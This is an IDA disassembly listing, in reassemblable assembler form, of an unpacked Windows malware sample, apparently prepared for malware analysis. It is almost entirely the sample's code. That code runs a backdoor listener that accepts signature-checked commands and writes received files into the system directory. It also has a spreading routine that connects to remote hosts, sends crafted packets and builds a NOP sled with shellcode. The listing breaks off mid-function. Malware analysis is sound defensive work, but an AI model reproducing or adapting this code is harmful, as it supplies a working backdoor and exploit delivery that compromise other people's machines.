;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : A5FC06A2514F68D5027E68847658AF38
; File Name : u:\work\a5fc06a2514f68d5027e68847658af38_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_401000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_401004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_401008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_40100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_403370+1F�r
dword_401010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_401014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_403370+5A�r ...
dword_401018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_40101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_401020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_401024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_401028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_4011F0+10A�r
dword_40102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_401030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_401034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_401038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_401040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_401044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_401048 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_40104C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_401050 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_401054 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_401058 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_40105C dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_403460+C�r
dword_401060 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_401064 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_403540+F�r
dword_401068 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_40106C dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_401070 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_4031F0+30�r
dword_401074 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_402590+7B�r ...
dword_401078 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4022A0+1F�r ...
dword_40107C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_4011F0:loc_4012D7�r ...
dword_401080 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_401084 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_402510+8�r
dword_401088 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4015E0+76�r ...
dword_40108C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_402790+10B�r
dword_401090 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_402790+8D�r ...
dword_401094 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_4016E0+56�r ...
dword_401098 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_401340+186�r
dword_40109C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_401340+17B�r ...
dword_4010A0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; UPX0:00402CE3�r ...
dword_4010A4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_4010A8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_402B00+15�r
dword_4010B0 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_4010B4 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_4016E0+292�r ...
dword_4010B8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401E10+AA�r ...
dword_4010BC dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_4028D0+EC�r ...
dword_4010C0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; UPX0:00402EC3�r ...
dword_4010C4 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpAdword_4010C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA align 10h
dword_4010D0 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_4010D4 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_4010D8 dd 77C47660h ; resolved to->MSVCRT.strchrdword_4010DC dd 77C371BCh ; resolved to->MSVCRT.sranddword_4010E0 dd 77C371D3h ; resolved to->MSVCRT.rand align 8
dword_4010E8 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_401E10+93�r ...
align 10h
dword_4010F0 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_4010F4 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_4010F8 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_4010FC dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState dd 0
dword_401104 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_401108 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_40110C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_401110 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_401114 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_401118 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_402C20+26�r
dword_40111C dd 71AB2DC0h ; resolved to->WS2_32.selectdword_401120 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_401124 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_401E10+48�r
dword_401128 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4016E0+2D�r ...
dword_40112C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4016E0+162�r ...
dword_401130 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_402CF0+A7�r ...
dword_401134 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_402CF0+101�r ...
dword_401138 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_402CF0+107�r ...
dword_40113C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_4016E0+581�r ...
dword_401140 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_4016E0+588�r ...
dword_401144 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401340+F1�r ...
dword_401148 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401340+B4�r ...
align 10h
; =============== S U B R O U T I N E =======================================
sub_401150 proc near ; CODE XREF: sub_401520+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
lea eax, [esi+4]
mov dword ptr [esi], 0
push eax
call dword_401074 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_401150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401170 proc near ; CODE XREF: sub_401520+3B�p
push ebx
mov ebx, dword_401034
push esi
push edi
mov edi, ecx
push 0
push 1
push 0
lea esi, [edi+10h]
push 0
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_4011A3
push 8
push 1
push eax
push eax
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_4011A3
pop edi
pop esi
mov eax, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4011A3: ; CODE XREF: sub_401170+1B�j
; sub_401170+28�j
mov eax, [esi]
add edi, 14h
push edi
push 0
push 0
push 114h
push offset dword_404000
push eax
call dword_401038 ; CryptImportKey
neg eax
sbb eax, eax
pop edi
and al, 0FEh
pop esi
add eax, 2
pop ebx
retn
sub_401170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011D0 proc near ; CODE XREF: sub_401520+8E�p
push esi
mov esi, ecx
mov eax, [esi+14h]
push eax
call dword_40102C ; CryptDestroyKey
mov ecx, [esi+10h]
push 0
push ecx
call dword_401030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_4011D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011F0 proc near ; CODE XREF: sub_401520+49�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 4
sub esp, 1Ch
lea eax, [esp+1Ch+var_10]
push ebx
push ebp
push esi
push edi
mov ebx, ecx
push eax
call dword_401084 ; GetSystemTime
lea ecx, [esp+2Ch+var_18]
lea edx, [esp+2Ch+var_10]
push ecx
push edx
call dword_401080 ; SystemTimeToFileTime
push 4000h
call sub_403640
mov ebp, [esp+30h+arg_0]
add esp, 4
mov esi, eax
mov eax, [ebp+0]
push 0
push 4000h
push esi
push eax
call dword_401144 ; recv
mov ecx, [esi+8]
mov eax, [esp+2Ch+var_18]
mov edx, [esp+2Ch+var_14]
lea edi, [esi+8]
sub ecx, eax
mov eax, [edi+4]
sbb eax, edx
cmp eax, 8
jg loc_4012D7
jl short loc_401261
cmp ecx, 61C46800h
ja short loc_4012D7
loc_401261: ; CODE XREF: sub_4011F0+67�j
cmp eax, 0FFFFFFF7h
jl short loc_4012D7
jg short loc_401270
cmp ecx, 9E3B9800h
jb short loc_4012D7
loc_401270: ; CODE XREF: sub_4011F0+76�j
mov edx, [ebx+10h]
lea ecx, [esp+2Ch+var_1C]
push ecx
push 0
push 0
push 8003h
push edx
call dword_40101C ; CryptCreateHash
test eax, eax
jz short loc_4012C6
mov eax, [esp+2Ch+var_1C]
push 0
push 8
push edi
push eax
call dword_401020 ; CryptHashData
test eax, eax
jz short loc_4012C6
mov eax, [esi+10h]
cmp eax, 2800h
ja short loc_4012C6
mov ecx, [ebx+14h]
push 0
push 0
push ecx
push eax
mov eax, [esp+3Ch+var_1C]
lea edx, [esi+14h]
push edx
push eax
call dword_401024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_4012F5
loc_4012C6: ; CODE XREF: sub_4011F0+9A�j
; sub_4011F0+AE�j ...
call dword_40107C ; RtlGetLastWin32Error
mov ecx, [esp+2Ch+var_1C]
push ecx
call dword_401028 ; CryptDestroyHash
loc_4012D7: ; CODE XREF: sub_4011F0+61�j
; sub_4011F0+6F�j ...
call dword_40107C ; RtlGetLastWin32Error
push esi
call sub_403660
add esp, 4
mov eax, 2
pop edi
pop esi
pop ebp
pop ebx
add esp, 1Ch
retn 4
; ---------------------------------------------------------------------------
loc_4012F5: ; CODE XREF: sub_4011F0+D4�j
mov edx, [esp+2Ch+var_1C]
push edx
call dword_401028 ; CryptDestroyHash
call dword_401078 ; GetTickCount
push eax
call sub_403686 ; srand
add esp, 4
call sub_403680 ; rand
mov [esi], eax
mov eax, [ebp+0]
push 0
push 4
push esi
push eax
call dword_401148 ; send
push esi
call sub_403660
add esp, 4
xor eax, eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1Ch
retn 4
sub_4011F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401340 proc near ; CODE XREF: sub_401520+77�p
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_108 = byte ptr -108h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
sub esp, 224h
cmp eax, 8
push ebx
push esi
push edi
jge short loc_401362
push 0
push eax
mov eax, [esp+238h+arg_4]
push eax
jmp loc_401502
; ---------------------------------------------------------------------------
loc_401362: ; CODE XREF: sub_401340+10�j
mov edi, [esp+230h+arg_4]
mov eax, [edi]
lea ebx, [edi+8]
test eax, eax
jnz loc_4014AC
lea edx, [esp+230h+var_108]
push 104h
push edx
call dword_40109C ; GetSystemDirectoryA
lea eax, [esp+230h+var_108]
push eax
call dword_401098 ; SetCurrentDirectoryA
mov ecx, [ebx]
mov esi, [ebx+4]
lea edx, [ebx+8]
push 104h
lea eax, [esp+234h+var_210]
push edx
push eax
mov [esp+23Ch+var_224], ecx
mov [esp+23Ch+var_218], esi
call dword_401094 ; lstrcpynA
push 0
push 0
push 2
push 0
push 0
lea ecx, [esp+244h+var_210]
push 40000000h
push ecx
call dword_401090 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [esp+230h+var_21C], eax
jz loc_401488
push ebp
mov ebp, [esp+234h+arg_0]
push 0
push 8
push edi
push ebp
mov dword ptr [edi+4], 1
call dword_401148 ; send
mov ecx, [esp+230h+var_220]
xor edx, edx
mov eax, ecx
div esi
xor edx, edx
mov [esp+230h+var_21C], eax
mov eax, ecx
div esi
test edx, edx
jz short loc_401416
inc [esp+230h+var_21C]
loc_401416: ; CODE XREF: sub_401340+D0�j
mov eax, [esp+230h+var_21C]
mov [esp+230h+var_220], 0
test eax, eax
jle short loc_401472
jmp short loc_40142C
; ---------------------------------------------------------------------------
loc_401428: ; CODE XREF: sub_401340+130�j
mov esi, [esp+230h+var_214]
loc_40142C: ; CODE XREF: sub_401340+E6�j
push 0
push esi
push ebx
push ebp
call dword_401144 ; recv
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_401472
mov eax, [esp+230h+var_218]
lea edx, [esp+230h+var_210]
push 0
push edx
push esi
push ebx
push eax
call dword_40108C ; WriteFile
push 0
push 8
push edi
push ebp
mov [edi+4], esi
call dword_401148 ; send
mov eax, [esp+230h+var_220]
mov ecx, [esp+230h+var_21C]
inc eax
cmp eax, ecx
mov [esp+230h+var_220], eax
jl short loc_401428
loc_401472: ; CODE XREF: sub_401340+E4�j
; sub_401340+FC�j
mov ecx, [esp+230h+var_218]
push ecx
call dword_401088 ; CloseHandle
pop ebp
pop edi
pop esi
pop ebx
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_401488: ; CODE XREF: sub_401340+99�j
mov edx, [esp+230h+arg_0]
push 0
push 8
push edi
push edx
loc_401495: ; DATA XREF: UPX0:off_404800�o
mov dword ptr [edi+4], 0
call dword_401148 ; send
pop edi
pop esi
pop ebx
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_4014AC: ; CODE XREF: sub_401340+30�j
cmp eax, 1
jnz short loc_4014E9
lea eax, [esp+230h+var_210]
push 104h
push eax
call dword_40109C ; GetSystemDirectoryA
lea ecx, [esp+230h+var_210]
push ecx
call dword_401098 ; SetCurrentDirectoryA
mov edx, [esp+230h+arg_0]
push 0
push 4
push edi
push edx
call dword_401148 ; send
pop edi
pop esi
pop ebx
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_4014E9: ; CODE XREF: sub_401340+16F�j
cmp eax, 3
jnz short loc_401510
mov eax, [ebx]
add ebx, 4
push eax
push ebx
call sub_402B70
add esp, 8
push 0
push 4
push edi
loc_401502: ; CODE XREF: sub_401340+1D�j
mov ecx, [esp+23Ch+arg_0]
push ecx
call dword_401148 ; send
loc_401510: ; CODE XREF: sub_401340+1AC�j
pop edi
pop esi
pop ebx
add esp, 224h
retn
sub_401340 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401520 proc near ; DATA XREF: sub_4015E0+CF�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 4
sub esp, 30h
mov ecx, 6
push esi
mov esi, [esp+34h+arg_0]
push edi
lea edi, [esp+38h+var_30]
rep movsd
mov eax, [esp+38h+var_1C]
push eax
call dword_4010A4 ; SetEvent
push 10000h
call sub_403640
add esp, 4
lea ecx, [esp+38h+var_18]
mov esi, eax
call sub_401150
lea ecx, [esp+38h+var_18]
call sub_401170
lea ecx, [esp+38h+var_30]
push ecx
lea ecx, [esp+3Ch+var_18]
call sub_4011F0
test eax, eax
jnz short loc_4015A1
mov edi, dword_401144
loc_401578: ; CODE XREF: sub_401520+7F�j
mov edx, [esp+38h+var_30]
push 0
push 10000h
push esi
push edx
call edi ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4015A1
test eax, eax
jz short loc_4015A1
push eax
mov eax, [esp+3Ch+var_30]
push esi
push eax
call sub_401340
add esp, 0Ch
jmp short loc_401578
; ---------------------------------------------------------------------------
loc_4015A1: ; CODE XREF: sub_401520+50�j
; sub_401520+6A�j ...
push esi
call sub_403660
add esp, 4
lea ecx, [esp+38h+var_18]
call sub_4011D0
mov ecx, [esp+38h+var_30]
push 2
push ecx
call dword_40113C ; shutdown
mov edx, [esp+38h+var_30]
push edx
call dword_401140 ; closesocket
push 0
call dword_4010A0 ; ExitThread
pop edi
xor eax, eax
pop esi
add esp, 30h
retn 4
sub_401520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4015E0 proc near ; DATA XREF: UPX0:00402F08�o
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 40h
push ebx
push ebp
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_401128 ; socket
mov edi, eax
xor eax, eax
mov ebx, dword_40112C
mov ebp, dword_401130
mov [esp+50h+var_38], eax
mov word ptr [esp+50h+var_38], 2
mov [esp+50h+var_34], eax
mov [esp+50h+var_34], esi
mov [esp+50h+var_30], eax
mov [esp+50h+var_2C], eax
loc_40161F: ; CODE XREF: sub_4015E0+5F�j
lea ecx, [esi+0BFBh]
push ecx
call ebx ; ntohs
lea edx, [esp+50h+var_38]
push 10h
push edx
push edi
mov word ptr [esp+5Ch+var_38+2], ax
call ebp ; bind
test eax, eax
jz short loc_401641
inc esi
cmp esi, 0Ah
jl short loc_40161F
loc_401641: ; CODE XREF: sub_4015E0+59�j
push 32h
push edi
call dword_401134 ; listen
mov ebx, dword_401138
mov ebp, dword_4010B0
mov esi, dword_401088
loc_40165C: ; CODE XREF: sub_4015E0+F8�j
lea eax, [esp+50h+var_40]
lea ecx, [esp+50h+var_28]
push eax
push ecx
push edi
mov [esp+5Ch+var_40], 10h
call ebx ; accept
push 0
push 0
mov edx, [esp+58h+var_28]
mov ecx, [esp+58h+var_20]
mov [esp+58h+var_18], eax
mov eax, [esp+58h+var_24]
mov [esp+58h+var_14], edx
mov edx, [esp+58h+var_1C]
push 1
push 0
mov [esp+60h+var_10], eax
mov [esp+60h+var_C], ecx
mov [esp+60h+var_8], edx
call ebp ; CreateEventA
lea ecx, [esp+50h+var_18]
mov [esp+50h+var_4], eax
lea eax, [esp+50h+var_3C]
push eax
push 0
push ecx
push offset sub_401520
push 0
push 0
call dword_4010AC ; CreateThread
push eax
call esi ; CloseHandle
push 3E8h
mov edx, [esp+54h+var_4]
push edx
call dword_4010A8 ; WaitForSingleObject
mov eax, [esp+50h+var_4]
push eax
call esi ; CloseHandle
jmp short loc_40165C
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_403190+2B�p
; sub_4031F0+79�p
var_128 = dword ptr -128h
var_11C = dword ptr -11Ch
var_10C = dword ptr -10Ch
var_A2 = byte ptr -0A2h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_38 = byte ptr -38h
var_1A = byte ptr -1Ah
var_C = byte ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_2C = byte ptr 30h
arg_30 = byte ptr 34h
arg_38 = byte ptr 3Ch
arg_4C = byte ptr 50h
arg_4F = byte ptr 53h
arg_54 = byte ptr 58h
arg_78 = byte ptr 7Ch
arg_79 = byte ptr 7Dh
arg_7B = byte ptr 7Fh
arg_7C = byte ptr 80h
arg_A4 = byte ptr 0A8h
arg_C4 = byte ptr 0C8h
arg_C5 = byte ptr 0C9h
arg_C8 = byte ptr 0CCh
arg_D8 = byte ptr 0DCh
arg_EC = byte ptr 0F0h
arg_660 = byte ptr 664h
arg_6D4 = byte ptr 6D8h
arg_770 = byte ptr 774h
arg_E78 = dword ptr 0E7Ch
arg_E88 = byte ptr 0E8Ch
arg_EB8 = dword ptr 0EBCh
arg_EC8 = byte ptr 0ECCh
arg_11EC = dword ptr 11F0h
arg_11F0 = dword ptr 11F4h
arg_11FC = byte ptr 1200h
arg_1410 = byte ptr 1414h
arg_148C = byte ptr 1490h
arg_1504 = byte ptr 1508h
arg_1C5C = byte ptr 1C60h
arg_2107 = byte ptr 210Bh
arg_23D0 = byte ptr 23D4h
arg_23F4 = byte ptr 23F8h
arg_2464 = byte ptr 2468h
arg_2468 = byte ptr 246Ch
arg_2F28 = byte ptr 2F2Ch
arg_44CC = byte ptr 44D0h
arg_4541 = byte ptr 4545h
arg_5560 = byte ptr 5564h
arg_6028 = byte ptr 602Ch
arg_6090 = byte ptr 6094h
arg_6098 = byte ptr 609Ch
arg_6099 = byte ptr 609Dh
arg_609C = byte ptr 60A0h
arg_8208 = dword ptr 820Ch
mov eax, 8214h
call sub_403690
mov eax, dword_404B04
mov ecx, dword_404B08
push ebp
push esi
mov esi, 1
push 0
push esi
push 2
mov [esp+14h+arg_8], eax
mov [esp+14h+arg_C], ecx
mov [esp+14h+arg_4], esi
call dword_401128 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_401C7D
push ebx
mov ebx, [esp+18h+arg_8208]
push edi
push 1Dh
push ebx
call dword_401120 ; inet_ntoa
lea edx, [esp+24h+arg_38]
push eax
push edx
call dword_401094 ; lstrcpynA
lea eax, [esp+2Ch+arg_2C]
lea ecx, [esp+2Ch+arg_4]
push eax
push offset dword_404AF8
push ecx
call dword_4010E8 ; wsprintfA
add esp, 0Ch
xor eax, eax
lea ecx, [esp+2Ch+arg_C5]
loc_40175D: ; CODE XREF: sub_4016E0+8E�j
mov dl, byte ptr [esp+eax+2Ch+arg_4]
inc eax
mov [ecx-1], dl
mov byte ptr [ecx], 0
add ecx, 2
cmp eax, 28h
jl short loc_40175D
mov ecx, 18h
mov esi, offset dword_40460C
lea edi, [esp+2Ch+arg_4C]
xor eax, eax
rep movsd
or ecx, 0FFFFFFFFh
lea edi, [esp+2Ch+arg_4]
repne scasb
not ecx
dec ecx
lea esi, [esp+2Ch+arg_C4]
shl ecx, 1
mov eax, ecx
lea edi, [esp+2Ch+arg_7C]
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
mov edx, dword_404663
rep movsb
lea edi, [esp+2Ch+arg_4]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
mov eax, dword_404667
dec ecx
lea edi, [esp+2Ch+arg_4]
push 1BDh
lea ecx, [esp+ecx*2+30h+arg_7B]
mov [ecx], edx
mov dl, byte_40466B
mov [ecx+4], eax
xor eax, eax
mov [ecx+8], dl
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
lea edi, [esp+30h+arg_4]
add cl, 1Ah
shl cl, 1
mov [esp+17h], cl
mov [esp+30h+arg_4F], cl
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
mov eax, 31313131h
shl cl, 1
add cl, 9
lea edi, [esp+30h+arg_1504]
mov [esp+30h+arg_79], cl
mov ecx, 38Ah
rep stosd
stosb
xor eax, eax
mov [esp+30h+var_8], eax
mov word ptr [esp+30h+var_8], 2
mov [esp+30h+var_4], eax
mov [esp+30h], eax
mov [esp+30h+arg_0], eax
call dword_40112C ; ntohs
lea ecx, [esp+30h+var_C]
push 10h
push ecx
push ebp
mov [esp+3Ch+var_A], ax
mov [esp+3Ch+var_8], ebx
call dword_401124 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401C67
mov ebx, dword_4010B8
push 1F4h
call ebx ; Sleep
mov esi, dword_401148
push 0
push 89h
push offset dword_4043F4
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
mov edi, dword_401144
push 0
lea edx, [esp+58h+arg_EC]
push 640h
push edx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
push 0
push 0A8h
push offset dword_404480
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
push 0
lea eax, [esp+7Ch+arg_C8]
push 640h
push eax
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
push 0
push 0DEh
push offset dword_40452C
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
push 0
lea ecx, [esp+0A0h+arg_A4]
push 640h
push ecx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
cmp eax, 46h
jl loc_401C5E
cmp [esp+0ACh+arg_D8], 31h
jnz loc_401B0A
mov ecx, 1F4h
mov eax, 90909090h
lea edi, [esp+0ACh+arg_6D4]
push offset loc_404120
rep stosd
mov [esp+0B0h+var_98], 0
call dword_4010B4 ; lstrlenA
mov ecx, eax
mov esi, offset loc_404120
mov edx, ecx
lea edi, [esp+0B0h+arg_770]
shr ecx, 2
rep movsd
mov ecx, edx
lea eax, [esp+0B0h+var_94]
and ecx, 3
push eax
rep movsb
call dword_4010B4 ; lstrlenA
mov ecx, eax
lea esi, [esp+0B4h+var_98]
mov edx, ecx
lea edi, [esp+0B4h+arg_E88]
shr ecx, 2
rep movsd
mov eax, dword_404A38
mov ecx, edx
and ecx, 3
rep movsb
mov [esp+0B4h+arg_E78], eax
loc_40199F: ; CODE XREF: sub_4016E0+511�j
movsx ecx, byte ptr [esp+13h]
mov esi, dword_401148
add ecx, 4
push 0
lea edx, [esp+0B8h+var_38]
push ecx
push edx
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
mov edi, dword_401144
push 0
lea eax, [esp+0CCh+arg_78]
push 640h
push eax
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
push 0
push 68h
push offset dword_404670
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
push 0
lea ecx, [esp+0F0h+arg_54]
push 640h
push ecx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
push 0
push 0A0h
push offset dword_4046DC
push ebp
call esi ; send
push 1F4h
call ebx ; Sleep
push 0
lea edx, [esp+114h+arg_30]
push 640h
push edx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
mov eax, [esp+120h+var_10C]
test eax, eax
jz loc_401BF6
mov ecx, 1Ah
mov esi, offset dword_404894
lea edi, [esp+120h+arg_6028]
push 0
rep movsd
mov ecx, 6D6h
lea esi, [esp+124h+arg_44CC]
lea edi, [esp+124h+arg_6090]
lea eax, [esp+124h+arg_6028]
rep movsd
movsw
mov ecx, 1Ch
mov esi, offset dword_404900
lea edi, [esp+124h+arg_23F4]
push 10FCh
rep movsd
mov ecx, 297h
lea esi, [esp+128h+arg_5560]
lea edi, [esp+128h+arg_2464]
push eax
rep movsd
movsw
mov ecx, 21h
mov esi, offset dword_404974
lea edi, [esp+12Ch+arg_2F28]
push ebp
rep movsd
mov esi, dword_401148
call esi ; send
push 1F4h
call ebx ; Sleep
push 0
lea ecx, [esp+138h+arg_C]
push 640h
push ecx
push ebp
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C5E
push 0
lea edx, [esp+148h+arg_23D0]
push 0FDCh
push edx
push ebp
call esi ; send
jmp loc_401C4F
; ---------------------------------------------------------------------------
loc_401B0A: ; CODE XREF: sub_4016E0+245�j
mov ecx, 36Bh
mov eax, 90909090h
lea edi, [esp+0ACh+arg_6D4]
mov edx, dword_404A74
rep stosd
mov edi, offset loc_404120
or ecx, 0FFFFFFFFh
xor eax, eax
mov esi, offset loc_404120
repne scasb
not ecx
dec ecx
lea edi, [esp+0ACh+arg_EC8]
mov eax, ecx
mov [esp+0ACh+arg_EB8], edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
mov [esp+0ACh+var_98], 1
rep movsb
mov ecx, dword_404AF0
mov edi, offset loc_404120
